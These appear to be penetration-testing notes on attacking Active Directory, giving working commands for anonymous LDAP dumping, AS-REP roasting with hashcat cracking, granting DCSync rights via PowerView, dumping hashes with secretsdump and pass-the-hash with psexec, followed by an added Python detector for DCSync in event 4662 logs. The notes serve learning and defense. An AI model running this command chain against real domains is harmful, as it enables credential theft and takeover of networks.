If you can authenticate to LDAP, either anonymously or with credentials, you can pull everything from it like so (simple bind, search base set with lowercase -b):
ldapsearch -x -H ldap://target -b 'dc=domain' -D '' -w '' '(objectClass=*)'
Alternatively, to get all users, you can use (the slash after domain is very important):
impacket-GetADUsers -dc-host target -all domain/
To query for users that don’t require Kerberos preauthentication, see AS-REP-Roasting:
impacket-GetNPUsers -dc-host target domain/
Then, to get a ticket-granting-ticket (TGT) (note: this does seem to ignore the -dc-host option, so edit /etc/hosts instead):
impacket-GetNPUsers -dc-host target -no-pass domain/user
You can then crack this ticket with hashcat -m 18200.
DC Sync
You can give users DCSync rights by:
Import-Module .\powerview.ps1
$pass = ConvertTo-SecureString 'password' -AsPlainText -Force
$cred = New-Object System.Management.Automation.PSCredential('domain\user', $pass)
Add-ObjectAcl -PrincipalIdentity user -Credential $cred -Rights DCSync
Once you have those permissions:
impacket-secretsdump domain/user@domain-controller
Then just pass the hash with:
impacket-psexec user@host -hashes hash
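On the defending side, DCSync is visible because a replication request is a directory-service access (Windows Security event 4662) asking for the DS-Replication-Get-Changes control-access rights, which only domain controllers should ever request. The script below is an added example, not part of the original notes: it scans constructed, flattened 4662 records and flags any non-DC account that requested those rights. The DC machine-account names and the key=value event layout are assumptions for the example.

```python
# Added example (not from the original notes): flag DCSync-style replication
# requests from accounts that are not domain controllers, using Windows
# Security event 4662 records. The event layout and samples are constructed.
import re

# Control-access right GUIDs requested during directory replication;
# they appear in the Properties field of event 4662.
REPLICATION_GUIDS = {
    "1131f6aa-9c07-11d1-f79f-00c04fc2dcd2": "DS-Replication-Get-Changes",
    "1131f6ad-9c07-11d1-f79f-00c04fc2dcd2": "DS-Replication-Get-Changes-All",
    "89e95b76-444d-4c62-991a-0facbeda640c": "DS-Replication-Get-Changes-In-Filtered-Set",
}

# Assumed: machine accounts of the legitimate domain controllers (constructed names).
KNOWN_DC_ACCOUNTS = {"DC01$", "DC02$"}

# Constructed sample events, flattened to one key=value line each.
SAMPLE_EVENTS = [
    "EventID=4662 SubjectUserName=DC02$ ObjectType=domainDNS AccessMask=0x100 Properties=1131f6ad-9c07-11d1-f79f-00c04fc2dcd2",
    "EventID=4662 SubjectUserName=jdoe ObjectType=domainDNS AccessMask=0x100 Properties=1131f6aa-9c07-11d1-f79f-00c04fc2dcd2;1131f6ad-9c07-11d1-f79f-00c04fc2dcd2",
    "EventID=4662 SubjectUserName=jdoe ObjectType=user AccessMask=0x10 Properties=bf967a86-0de6-11d0-a285-00aa003049e2",
    "EventID=4624 SubjectUserName=jdoe LogonType=3",
]

def parse_event(line):
    """Turn a flattened key=value event line into a dict."""
    return dict(re.findall(r"(\w+)=(\S+)", line))

def find_dcsync_suspects(lines, known_dcs=KNOWN_DC_ACCOUNTS):
    """Return (account, [right names]) for every 4662 event in which a
    non-DC account requested replication rights with the control-access
    mask 0x100. DC-to-DC replication is expected and is skipped."""
    dc_names = {d.upper() for d in known_dcs}
    suspects = []
    for line in lines:
        ev = parse_event(line)
        if ev.get("EventID") != "4662" or ev.get("AccessMask") != "0x100":
            continue
        guids = ev.get("Properties", "").lower().split(";")
        rights = [REPLICATION_GUIDS[g] for g in guids if g in REPLICATION_GUIDS]
        if not rights or ev.get("SubjectUserName", "").upper() in dc_names:
            continue
        suspects.append((ev["SubjectUserName"], rights))
    return suspects

if __name__ == "__main__":
    for account, rights in find_dcsync_suspects(SAMPLE_EVENTS):
        print(f"ALERT: {account} requested {', '.join(rights)}")
```

The same check works on real 4662 events once the Properties and SubjectUserName fields are extracted from the event XML; enabling "Audit Directory Service Access" on the domain controllers is what produces them.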
Oh, and don’t forget to use Bloodhound. Very nice LDAP visualizer.